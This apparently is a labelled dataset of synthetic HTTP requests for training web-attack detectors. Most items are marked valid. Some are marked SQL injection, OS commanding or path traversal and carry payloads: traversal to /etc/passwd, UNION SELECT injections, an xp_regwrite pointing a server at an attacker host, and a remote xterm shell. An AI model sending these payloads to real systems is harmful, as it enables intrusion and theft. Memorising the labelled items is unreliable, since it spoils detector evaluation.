GET /dR23cBm/n8eY9qfN.IePEroGl/autoexec-vNV0d/Y8BR/n4W@k/aOPNMlt_@tbIx4D6VQf/am1aoUaamocreX/nuasw/afMxf2LYkLUcj5b9QK.exe?xaFse0ntakE=lhpositionw&Mnmuuihxtz=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&nuOaetuaentl78g=hgi&x9vhdfXqeGe=37993&embamjitz=nreopet6u&nNydiiqurg=nwp-cftm0aee&ethmv=Cxmldiw-ca&0h2howq=6129722&erp8rwap=p0so4d&beulgc=5737&gih7ineEp=sQPnsVhvKuS HTTP/1.0
Host: www.htn9.net
Connection: cbhes9
Accept: audio/*;q=0.3, audio/*;q=0.9, image/png;q=0.1
Accept-Charset: x-mac-arabic;q=0.5, x-mac-greek;q=0.4, iso-8859-7, utf-7
Accept-Encoding: *
Accept-Language: Evdftvs-w0hnsh;q=0.7, abwp-uo8;q=0.8, afpe-H
Cache-Control: n5oeohS='e'
Client-ip: 131.126.28.0
Cookie: yhh3aUab7et4eo=@updateis1z;eahcr5muhlmi=233
Cookie2: $Version="92"
Date: Tue, 01 Apr 08 02:16:28 GMT
ETag: "qTKDkaKodzPSVS8-"
Expect: 100-continue
From: o8nret@EbsFqo4s.st
If-Modified-Since: Sun, 11 Sep 05 07:10:35 CET
If-Unmodified-Since: Thu, 05 Aug 04 11:55:45 CET
If-Match: "brpk6iGhZ@Eq7W6cn"
If-None-Match: *
If-Range: Wed, 31 Mar 04 05:59:30 CET
Max-Forwards: 1953
MIME-Version: 8.9
Pragma: un=MeaeHe1i
Proxy-Authorization: NTLM d29vc2FoY21qbE9uYW90ZW5jc2hzNnRpZWxvVGxPbjRlYWd0cjRl
Authorization: Basic ZXRyOUk6N2xtc2g=
Range: -99,17-4389
Referer: http://ocre.ch/ebtDno/alnt.cfm
TE: gzip;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 6.8; nl-ng; rv:9.3.6) Gecko/19661575
UA-CPU: PowerPC
UA-Disp: 542,0115,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1380x824
Via: HTTP/8.5 www.las2ets.jpg
Transfer-Encoding: deflate
Upgrade: Su9qj/8.6, baec/7.2
Warning: 013 22.194.211.11 "8iCne9m5iQhhsaHen19e" 
X-Forwarded-For: 136.2.161.83
X-Serial-Number: 1060683
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46280
Start - Id: 28498
class: Valid
GET /fWViZqadminHpassthru0MNlhttp./va1n/8iYa.gif?kesRt=leodn%25&daeAzrero=5&shavingI0=sr HTTP/1.1
Host: 242.147.219.142:332
Connection: keep-alive
Accept: video/*, image/*, application/x-tar
Accept-Charset: utf-8;q=0.3, utf-8;q=0.4
Accept-Encoding: compress;q=0.1, identity, compress
Accept-Language: n-nig;q=0.0, ecgwua-oeb9ix;q=0.4, 2ttrr-P;q=0.3, rtl1t-rdpei;q=0.8, jri-rexnn;q=0.6
Cache-Control: oyitire='t'
Client-ip: 229.55.227.78
Cookie: nq0ge=5675;gqteHutenTa=erooa1iteowloE
Cookie2: $Version="5"
Date: Tue, 12 Apr 05 02:26:50 GMT
ETag: "7v1k5OEHH1noZDlI186"
Expect: 100-continue
From: rbaSl@tdcutcZ3sd.be
If-Modified-Since: Fri, 30 Oct 09 08:49:36 UTC
If-Unmodified-Since: Sat, 18 Feb 06 04:07:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0117
MIME-Version: 1.9
Pragma: enahe='oricoe'
Proxy-Authorization: Basic ZmVhRG9vMXg6dG5ydGRjZW4=
Authorization: NTLM WGV3cXBtdUF6bWNPYm9sRWJneWJkZGFuaWNJZXNlaGVvYmlnaWFlbmZldA==
Range: 342905-6,364-
Referer: http://www.ltuyreh5.be/bhlxrtd/mhasl/iUe6meth.js
TE: gzip;q=0.5
Trailer: Connection
User-Agent: xnRo4vf7p http://www.i2fdsma.be
UA-CPU: x86
UA-Disp: 8399,990,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 116x668
Via: 9.6 www.rloaqlta.jpg
Transfer-Encoding: identity
Upgrade: t5rg/1.6
Warning: 107 www.iwhhs.shtml "74siedtii" 
X-Forwarded-For: 36.15.26.228
X-Serial-Number: 77486322
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 28498
Start - Id: 26018
class: Valid
GET /oewaou2/eLSIdhX3rgx6nU/7BYU-FU2ZIxterm9Dou/nttEhbToerreaig.html?crnnleactNtaee=e.p%40rhbFiQsP&eoaeb=643&iFt42gtnn=68863994&na0gctpstj=tj&rnnusodnrrKWiA=usrpn%2798%7EFi&5Ys@WM4=0397334&rzayE0=757869 HTTP/1.0
Host: 83.220.154.146
Connection: close
Accept: image/*, text/html, application/*
Accept-Charset: cp-932
Accept-Encoding: identity;q=0.3, identity;q=0.7, compress;q=0.6, identity;q=0.6, identity;q=0.9
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 157.41.225.239
Cookie: ttste=rPUzXs;edDa=gkdf3erc2ArakGati
Cookie2: $Version="7"
Date: Mon, 25 Aug 08 15:37:52 GMT
ETag: W/"2Z@8jn@K098vvdP_8cU"
Expect: 100-continue
From: nchut@r3st.it
If-Modified-Since: Sun, 04 Jun 06 07:09:06 GMT
If-Unmodified-Since: Fri, 18 Aug 06 08:42:58 CET
If-Match: "h4mZTw803c3yNdGe76xu"
If-None-Match: *
If-Range: *
Max-Forwards: 12
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic dHVhZHg6aEhFenJuZA==
Authorization: ha9a9 sng2=r8fS
Range: 93614-
Referer: http://www.hohAo.cz/hcta/thnyrtP8/hrssrrn.jpg
TE: trailers,deflate;q=0.2,deflate
Trailer: Max-Forwards
User-Agent: Mozilla/9.4 (Machintosh; U; Mac OS X 4.4; io-oi; rv:2.7.4) Gecko/11666853
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8535x949
Via: 6.7 www.otzas.js:9370, 7.0 212.178.216.143, 4.1 www.aaefa.css
Transfer-Encoding: compress
Upgrade: yuk/5.7, RisS/8.9
Warning: 578 216.112.216.157 "mtdt" "Thu, 22 Apr 10 15:51:14 GMT"
X-Forwarded-For: 203.134.237.5
X-Serial-Number: 2136376568868794089
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26018
Start - Id: 41372
class: SqlInjection
POST /i9O-hIH41siT3E/lD7inzbRJed_On/EegbsxlsaE1/x35d1sKwgaiFK6mrOw/nitB/aURL99zq.html? HTTP/1.1
Content-Length: 195
Content-Language: ceri2,nEddashh
Content-Encoding: identity
Content-Location: http://useEN.it/yul2f.gif
Content-MD5: c3VvME5jaWU0aXJkdDRjZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 May 06 24:24:10 GMT
Last-Modified: Mon, 31 Jul 06 05:35:08 CET
Host: www.3hnu.uk
Connection: keep-alive
Accept: image/jpeg;q=0.1, image/*, video/mpeg
Accept-Charset: us-ascii, iso-8859-2;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=1504
Client-ip: 189.185.229.134
Cookie: d0varF6SFBDH='uw~ eo4u\tmadcm\i;eseoa=dKYcjSUK
Cookie2: $Version="234"
Date: Mon, 03 Dec 07 12:10:53 GMT
ETag: "1szJG5Qqdon.9toUC3"
Expect: b0lpp=toalgtto;n4syos
From: wvycy@8isLoesg.de
If-Modified-Since: Thu, 29 Apr 10 18:45:48 GMT
If-Unmodified-Since: Sat, 28 Mar 09 13:40:00 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 01 May 06 06:36:21 GMT
Max-Forwards: 2254
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: l9efB apttswR=i4N4hr7t
Range: 32232-38984,57-
Referer: http://eto0oie.net/lr1snh/6eNHrt/ekra/ufmDwse/a8mc0.exe
TE: deflate,trailers,chunked
Trailer: Accept-Language
User-Agent: nhwb (aQ1dCf3Zi; aIdbZjq6)
UA-CPU: 68000
UA-Disp: 320,3937,32
UA-OS: Windows NT
UA-Color: color32
Via: HTTP/5.9 172.53.5.70:134
Transfer-Encoding: compress
Upgrade: nto/6.6, ero7er/3.3, Axmpf/2.4
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Serial-Number: 102930294622
----: --------------

eieNptioaernl=;     exec   get_cust(    'x''   union select    object_name,object_type,''x''     from   user_objects     where    ''rvn''    =   ''   ');

End - Id: 41372
Start - Id: 41976
class: SqlInjection
GET /gremytte9/eo.js?0reialy4an=8736&ontmmm49ilj=elvT%404en1taNo&tosibuR=4mveo3mi&areIe0Goiitoe6n=b+reV&roehait=o%2Bo6a%24dZ&iyakawety=%27%29++UN%2F**%2FION++++ALL++++SEL%2F**%2FECT++%274btfnreukn%27%2C978%2C86%2C%27Ca%27%2C9++++FROM++eq+WHERE++%28+%27%27++++%3D+++%27&fa37swfthtrrh=03220322&sR81=83020&Uyi_ADvt0=slegsorcp1aee%7E1xml+%3Eedv&5r=04408&ecepar=%29%29aFe&uastinhoko3=cathiaor6oseova HTTP/1.1
Host: 236.39.188.213:8555
Connection: close
Accept: text/xml, audio/*;q=0.4
Accept-Charset: iso-2022-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 124.187.36.33
Cookie: nisd8enca=pcrl;yth3hn1maee=vre
Cookie2: $Version="6"
Date: Wed, 07 Feb 07 18:34:39 GMT
ETag: W/"Og0DfX_az@vGIC@GluS"
Expect: 100-continue
From: Iyirabt@mar7tEeeb7.de
If-Modified-Since: Thu, 12 May 05 03:15:40 GMT
If-Unmodified-Since: Wed, 10 May 06 16:20:19 UTC
If-Match: *
If-None-Match: "mPM7zyqu8.scSvI"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 8351
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest uri=http://Ih9gc.net/soss.txt
Authorization: Digest opaque="oanyHawn"
Range: -221064
Referer: /wae4ttl.jsp
TE: trailers,deflate;q=0.1
Trailer: If-Range
User-Agent: Mozilla/6.5 (X11; U; Unix 0.9; qr-hz; rv:9.7.7) Gecko/54375838
UA-CPU: Sparc
UA-Disp: 4298,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 329x4778
Via: drtyN/9.2 www.uvoo.tiff, 5.1 169.244.158.211
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 237 www.niiai.tiff "6aniv2xeemiUvSmef1" "Fri, 09 Apr 04 14:40:51 GMT"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 382676240
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41976
Start - Id: 41022
class: SqlInjection
GET /rsnEeSi/oc9CZQem1ha_mKe_iz/cHT6wh9bTyW/iszsywihhEtaea/8xgn/z2hdeqS7itoo/3shs/mWnBoRinsert/oDQx.png?Td0V=8tfe&eolorosg=exec+++++xp_regwrite+%27HKEY_LOCAL_MACHINE%27%2C%27SOFTWARE%5CMicrosoft%5CMSSQLServer%5CClient%5CConnectTo%27%2C%27ds7iSS0cs%27%2C%27REG_SZ%27%2C%27DBMSSOCN%2Chackersip%2C80%27 HTTP/1.1
Host: 20.237.145.38
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: identity, gzip, gzip;q=0.1, compress;q=0.4
Accept-Language: Omm-knu;q=0.8, iam-csV, Rttt-haluh;q=0.4, mi5ta-elI7;q=0.6, tnoorA-sgctj
Cache-Control: max-age=88
Client-ip: 109.121.222.214
Cookie: wz0iefo9yuy=6nCsy
Date: Wed, 12 Jul 06 01:38:24 CET
From: nr8inpt@ayntTOpcTs.it
If-Modified-Since: Fri, 20 Feb 09 11:58:44 CET
If-Unmodified-Since: Tue, 14 Dec 04 02:43:23 GMT
If-Match: *
If-None-Match: *
Max-Forwards: 2
MIME-Version: 5.4
Proxy-Authorization: Basic Ymxld3Vobm46ZWV0dGU=
Authorization: lIainj 9eeoiltf=seddibai
Range: 770-,-93926
Referer: /dEuqSaE/ns5e/thee/rtteth/asa1r.htm
TE: trailers,trailers,gzip;q=0.9
User-Agent: hhhiLlrsDt (wgUFz07; sCMMgX; i8h1-3)
Via: FTP/2.4 www.hdylu.htm
Transfer-Encoding: compress
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 484 www.41xtiu.shtml "ffgplwga7ia3nttt" "Sun, 25 Apr 10 04:50:48 UTC"
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41022
Start - Id: 18094
class: Valid
GET /S-bodyq/h.g90EKN/7nuqhcsoe/l7HMKoGeCrEIyd/u5e/lWGSkvj9fzSM/apXxbUbGZyYYp.jpeg?ttromip=0&haaearuTt=pxchdshtLnimhveh&tb9mctsa=sa&spo4nO=s+nesest&10openQifsI6B=%3CE%3Cn&ssailewKtEh=aEtHBBaqS HTTP/1.1
Host: www.eTMWmag.fr
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr, x-mac-japanese, cp-932;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 14.203.190.107
Cookie: mcrtubaanxry7cs=2135;dse1yso0s7drl=rg9fbQip;1hj35Srrfeoe=te07erisreneaPydji;mA=httpsihi;omug2noab2xeha=alinkgroup byihp 4inputHi7inputp0d
Cookie2: $Version="1"
Date: Sun, 16 Aug 09 15:10:05 GMT
ETag: W/"eHmW0mNcEda-3Z5u"
Expect: eprCieoo=fsdos
From: oecjtte@aJits.ch
If-Modified-Since: Sun, 02 May 10 01:03:37 UTC
If-Unmodified-Since: Mon, 13 Jul 09 06:32:37 UTC
If-Match: "eBPLIFkt@2N1IzqM0Wc"
If-None-Match: *
If-Range: "lpKKwTGdLlVwjDRA"
Max-Forwards: 631
MIME-Version: 8.3
Pragma: jis2i='iSsjdZe2'
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: Basic eGlwc3Y6aExoZGlmaWU=
Range: -0327
Referer: http://tTt6luc.st/dheuess7/ioawtrn.mpg
TE: chunked;q=0.6,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.7 (Machintosh; U; Mac OS X 5.0; he-ll; rv:3.4.8) Gecko/99375118
UA-CPU: MIPS
UA-Disp: 401,696,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 022x8341
Via: FTP/4.3 10.77.59.68, HTTP/1.1 231.23.21.168
Transfer-Encoding: compress
Upgrade: triedg/0.8, sgneu/3.4, 95rs/2.7, tqU/0.4, shfsat/8.7
Warning: 504 www.jecaa.jpg "whtdsrErtaeai" "Sun, 11 Sep 05 02:40:23 GMT"
X-Forwarded-For: 22.251.252.232
X-Serial-Number: 0963814403346136
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18094
Start - Id: 30696
class: Valid
GET /yEt/jVCAg9GR/ehpL8eGqew/ywd6efr7on0ufna/wbsugdsko/ibiwZE_YapS2JtkC2V0/rqb9EY.jsp?1eionnub0Se41s=3N7&0BPGSTa@Da.=nneoiezne HTTP/1.1
Host: 209.174.202.136
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: o2t-ajny, 30wt-p4hn6z;q=0.7
Cache-Control: no-store
Client-ip: 188.252.4.241
Cookie: eaosihfwRch=4740;-sk5=exwNW9E;vietnirt=3796459690;mvA5t7kac=aretbol
Cookie2: $Version="2"
Date: Tue, 08 Apr 08 01:41:52 GMT
ETag: W/"aR0XKp0GV0OmR3jxMqV"
Expect: hyT0deW=eeuh
From: aeec@eeAs.fr
If-Modified-Since: Mon, 06 Dec 04 13:05:39 UTC
If-Unmodified-Since: Sun, 06 Jun 04 17:16:42 CET
If-Match: "xhnrNB3VlH.n@PBb3"
If-None-Match: *
If-Range: *
Max-Forwards: 8921
MIME-Version: 7.4
Pragma: iEpveid=iake
Proxy-Authorization: Digest response="2A65cd9EabBC61E562DdDFBfeDaAebf9"
Authorization: Basic bWlkUzp0YW9hbDZrcw==
Range: -254
Referer: /Qn5tehei/7aertemE/frnea/mxqseEel/oseel.png
TE: trailers,trailers,chunked;q=0.3
Trailer: Upgrade
User-Agent: Mozilla/9.4 (Windows; U; Win98 1.7; s1-do; rv:1.6.1) Gecko/11295796
UA-CPU: 68000
UA-Disp: 9503,087,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7462x1873
Via: 0.0 246.186.11.118, 6.6 www.oyielse.tiff, HTTP/7.5 www.saoAapc.gif
Transfer-Encoding: hioh
Upgrade: caib/8.0
Warning: 498 www.sep0d.js "fbed2" 
X-Forwarded-For: 229.134.94.56
X-Serial-Number: 62673072943112918
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30696
Start - Id: 28687
class: Valid
GET /aei/nHCdeFVWOS1jax7HSSF/t5UbSXZul1/e4fdhco/5qkHc/NL33W-FAKMmcNR/mH6V/mgta7arl9euoa9aeeu/tzGCall.n3/-uvWNconnectzgWkiQdqq/4YE53/lT6.php4?arudzzlan=830&npuenientenn=489119&edopb=107164&aenssabtiso=h&sovrnjIo1ema=tsuyno8Ut9l&oaecnrfnrdi=253&mo4=n%5Dti&v34z=71272&a7snns5AseuxCr=lecho%3E&EhfnLnqTihnata=74595629&szogo0=99&akowaotle=2170 HTTP/1.1
Host: www.sete3uz.be
Connection: keep-alive
Accept: application/*;q=0.3, application/*
Accept-Charset: *
Accept-Encoding: identity;q=0.6, identity, deflate;q=0.1, compress
Accept-Language: r1oaNr1t-smhN, ontiatle-mB, p-evoJrmf
Cache-Control: max-stale=46
Client-ip: 0.56.186.6
Cookie: h6=nWwibDMgva;bxhgt=841346;xHobj0=ofrj5hMlDQ4n
Cookie2: $Version="59"
Date: Fri, 02 Apr 10 10:01:00 UTC
ETag: "TP8yCM86v@9eNQkTdSni"
Expect: 100-continue
From: 9rL2esue@fang.it
If-Modified-Since: Sun, 11 Jul 04 15:36:14 GMT
If-Unmodified-Since: Mon, 06 Jul 09 11:12:18 UTC
If-Match: "_ywr.9KXRf8Z3@ffawu"
If-None-Match: "c0DY3YOOWKnI8n9fw"
If-Range: *
Max-Forwards: 83
MIME-Version: 0.9
Pragma: yAbflne=stmer
Proxy-Authorization: Digest response="402fAbe20bCA7521de8FBa324bDF8Af8"
Authorization: hkt9q qslrm=iixY
Range: -440021
Referer: /soal.tiff
TE: deflate;q=0.6
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.4 (Machintosh; U; PPC 4.9; ab-ne; rv:0.4.4) Gecko/95945605
UA-CPU: Sparc
UA-Disp: 638,830,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 621x541
Via: FTP/9.4 108.183.214.218, 2.6 www.ebe6htei.png
Transfer-Encoding: deflate
Upgrade: mptnoI/0.5, iTp4m/8.4, 0hyWd/3.5
Warning: 301 www.imbgmn.html "3hfoDiswcieii1rergd1" "Thu, 12 May 05 01:08:10 UTC"
X-Forwarded-For: 70.75.45.186
X-Serial-Number: 244229732731
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28687
Start - Id: 14581
class: Valid
GET /d_pJTRZmRA1scnY/ZuAxKD4shutdownshutdownb.php?QwhLkeXWk=1178&5eqrpxynahn3or=rcpawneos%3Dsl%2Biha&poetesan=4laA0sebtzoRpyaa&mi0irtsacadco9=yneyMiwilmioAs&bi41T=3&tsb=a&ai=oNhF8JGz&seoeScs=22844&bxnecct=ew+dtfiaoo&rbayrearf5q=dWpm&JVVmViH9N=13892&onoaaieHd=412461&iDtmenoQaasej=usUai_s HTTP/1.1
Host: www.e5idhj.uk:47
Connection: close
Accept: image/*;q=0.8, text/*;q=0.3, application/zip;q=0.3
Accept-Charset: iso-8859-15, euc-jp;q=0.9, x-mac-hebrew;q=0.7, x-mac-chinesetrad;q=0.2, cp-932;q=0.5
Accept-Encoding: identity, identity;q=0.4, identity;q=0.8, compress, compress;q=0.1
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 22.174.172.88
Cookie: uj=e1iactroelnM
Cookie2: $Version="25"
Date: Sun, 14 Jan 07 04:28:52 GMT
ETag: "7Y_LQYMG07XhR89YbcDL"
Expect: ifii
From: Iunytn@meeieTRgnn.ch
If-Modified-Since: Tue, 08 May 07 13:51:01 CET
If-Unmodified-Since: Sat, 08 Nov 08 09:49:01 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9140
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic T2lzb21JeDpkZFlmdXFvdw==
Authorization: NTLM ZURvTGZpbmN1aW9pc3RzZWkxZWd0ZG9mNGxyOW9PZXpUZXNrcXF0RVk=
Range: 45-4785,-21867,70176-3030
Referer: /oxnah/ethtscy/nrxcc.jsp
TE: trailers,trailers
Trailer: If-Match
User-Agent: r8nlraik/1.1
UA-CPU: PowerPC
UA-Disp: 1652,237,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 658x567
Via: 8.2 www.t0dOuDle.css
Transfer-Encoding: Pniesd
Upgrade: ob83t/0.9, dknr/1.9, tfeyhk/0.8, eqbo/3.7, 0mt9a/2.3
Warning: 663 www.eNonNsgt.tiff "zwetin" "Wed, 09 Feb 05 17:14:54 GMT"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 30157700928193740
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14581
Start - Id: 26641
class: Valid
GET /j.JCGPZ/samXM.OjZ0nBzE5/s0Wr4.PKvXAFj1vdn/mdcadr/lN/hO9c8e4tlt/4ehuroenlotnossneo/cGNQaze94aI-3px/pEuQD.@-3openobjectB/nn4j/fw49AFKwh/FUL.oRwJdelete2Y.tiff?eao2nreestbe=tvG&2dt=%25w&2ntthew82Asa=476791&nlYouc5Ooti=erothntls&seinsexa=gEOy-3VdErc&DTbtothrmt=exp_eaM&zte52syrtsnm1uH=Qi%3DtmpereplacetsstH%40e&M6aduOonl=oZchk-xRoD&aWDy=j%3Edp%3BlosUkahahy&f4wbaln=tEQxwjcQ&saeeemltm=1941851&n1e=t+&esau2rnitfsdag=64 HTTP/1.1
Host: www.tseg3.uk
Connection: 4oat
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: dle85-ten6sto;q=0.6
Cache-Control: only-if-cached
Client-ip: 227.188.228.228
Cookie: Cno5asgeri6=24879218;nwrknol=qeyrCP3t5dh0lu4;IesleTnwesdatmd=048786
Cookie2: $Version="70"
Date: Mon, 14 Dec 09 11:31:36 GMT
ETag: "g2oiPxuzFFx.CE8SW"
Expect: 100-continue
From: ent1Te@fuoo4x2ou.it
If-Modified-Since: Sun, 17 Apr 05 04:37:11 GMT
If-Unmodified-Since: Sun, 02 Aug 09 06:24:25 CET
If-Match: *
If-None-Match: "X7-bzSWEX4cAn.J"
If-Range: "cFz2JxNfvEqAyFLdVFjj"
Max-Forwards: 9
MIME-Version: 5.1
Pragma: qcn=uoljy
Proxy-Authorization: NTLM NHRiZHJzb29Tc25lbnkzZG9lYWFKcmxlc2lyaXR0ZWV0bmFvc2Nhdg==
Authorization: Basic cmdMaWRzSTprZVNuaA==
Range: 0-8818,879-
Referer: /Nts23hr/vd85enhj/eWnoTEei.ace
TE: trailers
Trailer: Accept-Encoding
User-Agent: e5dwpgut
UA-CPU: Sparc
UA-Disp: 080,9861,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 190x433
Via: HTTP/1.6 www.r5ndb.js, 2.0 www.jheoe.jpg
Transfer-Encoding: deflate
Upgrade: dss/7.0, hee/2.6, eu9/8.4, uieiTe/9.3, ynTjo4/4.2
Warning: 556 www.nSecserr.shtml "kaqb8" "Fri, 10 Aug 07 08:19:22 CET"
X-Forwarded-For: 232.156.39.113
X-Serial-Number: 21651458708939157204
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26641
Start - Id: 7988
class: Valid
PUT /retae8euef9oait9yhln/ocigdwMiteiuose/lALKPOBOXcE_FIVNR./OZCUp3/dYortmpkD0XdOFU/ywtieheent7/i_f8N/t48dZ/dHapy/lj1j/izssisguB/ihusecu.php4? HTTP/1.0
Content-Length: 12
Content-Language: erd1
Content-Encoding: identity
Content-Location: http://www.wfa7S.gov/Demedvo/VhAyaTE/ateeedh/nnsr5sN.css
Content-MD5: OGlob25Bc05uYnNzcmU5dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 01 Mar 05 19:32:22 CET
Host: www.EUer4t.gov
Connection: close
Accept: video/*, image/png
Accept-Charset: windows-1253, x-mac-cyrillic;q=0.9, windows-1257, hz-gb-2312;q=0.9, x-mac-cyrillic
Accept-Encoding: deflate;q=0.2, deflate;q=0.3, compress;q=0.7, compress, identity;q=0.2
Accept-Language: dhpr-plHu, lnj2c-ih9t;q=0.8
Cache-Control: no-store
Client-ip: 50.48.106.212
Cookie: iseneonno4erkbn=md]csaexisxr3include;iyeptimjcomatrj=php/esecho;iyrohn=h.m
Cookie2: $Version="357"
Date: Mon, 27 Sep 04 05:00:35 CET
ETag: "Uor8lt.MJfvmU1Tkr"
From: bushz@heaorargkl.ch
If-Unmodified-Since: Wed, 30 Apr 08 06:21:26 GMT
If-Match: "T6@cry3yn7PLlW0-w"
If-None-Match: "N6v5TTrTytY3jcV"
If-Range: *
Max-Forwards: 596
Proxy-Authorization: Fs9vs 82ivtD=qasoo
Authorization: Digest qop=auth-int
Referer: /srhTwxc/stSAaat/eygcy2br/neYHs.jsp
User-Agent: Mozilla/3.2 (compatible; dgmaewUMa; Windows NT; dHoifhS9eg; ahnjerh; dK4co)
Via: 6.6 31.56.4.214:5, 0.8 www.onacectI.css:3093, 8.3 www.zojsh.htm
Transfer-Encoding: deflate
Upgrade: o3ir/4.7
X-Serial-Number: 57071763

sbs=11844347

End - Id: 7988
Start - Id: 43383
class: OsCommanding
GET /.MzwH7mocha-/rdetfoeeeW5rtessdb/sdsnfaineMfnk5r/0E/kKXBbmNdZCVJpiC/tCkmEpRfFDm-AQu8HOs/5TEvtti/m2ttIpiyoedb8eiln/vNVqQBevwp-d._/fOHeofiqt5/ecIeloD@3My4kN3KgIV.pl?lo=aaoxo&bhvMuehs=eaiffg&getciframeY1C=tmpRcnt&dl=922924&Hske6r=2828&oi=%5Crxterm++-display+++++103.1.32.63%3A0.0&6eeenirreqlEsd=82516 HTTP/1.0
Host: 216.152.150.179:80
Connection: close
Accept: text/*;q=0.7, audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, deflate;q=0.0, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 218.45.110.121
Cookie: @B1OFPmeHDH=2;coA4sEtfnsorlr=itnmetant(<;witqb
Cookie2: $Version="6"
Date: Thu, 12 Mar 09 22:13:21 CET
ETag: W/"oThLttcItnH6jh1_m"
Expect: a2s3toh=auieoceh
From: no4b@rasantepan.ch
If-Modified-Since: Tue, 25 Nov 08 17:09:32 UTC
If-Unmodified-Since: Mon, 17 Aug 09 06:44:39 GMT
If-Match: "J6Tl_jXgltnfTMX"
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic OGlldnM6aW5vdA==
Authorization: NTLM aUFhdDRtc2Z1dWVjdGhldW8zZWFlZWwzb3NTYmNkdWxlbkQ1YW90cm5xdEw5aG9h
Range: 233-,3-70638,78-7879
Referer: /9aaeH/Td1s/onrn/as8w.cfm
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/1.0 (Windows; U; Win 9x 2.8; ym-ju; rv:1.8.7) Gecko/72734595
UA-CPU: PowerPC
UA-Disp: 5052,410,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: 5.5 www.8ramrcoN.png, 1eme/7.4 57.108.71.68
Transfer-Encoding: deflate
Upgrade: ehie/7.0, fyH/5.8, phx/0.7, t9e/1.5, u9Dar/1.3
Warning: 760 153.140.23.116 "tasreEom4" "Mon, 12 Apr 10 01:21:27 GMT"
X-Forwarded-For: 218.232.240.132
X-Serial-Number: 68319129
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43383
Start - Id: 44758
class: PathTransversal
GET /4TYFUbUZzh3Peb/a9en9ck4/ertihsUottc/TC/sel4d15fJgv.htm?0y1q0bZ6=s%3FcoSdnra&eCndroeatl=8232&Naa14nnehW=eISsuH&1a=hetHLY&f7o=E&Hn=aZL9B&ezedack=2u9&mwo4edeht=l&sS=1&w6q5=%2F.%2F..%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F.%2F..%2F..%2F..%2F&Tc2no=ccS_&fa6hbeiit=1 HTTP/1.1
Host: 99.241.81.53
Connection: keep-alive
Accept: image/*;q=0.1, image/png;q=0.3, text/plain
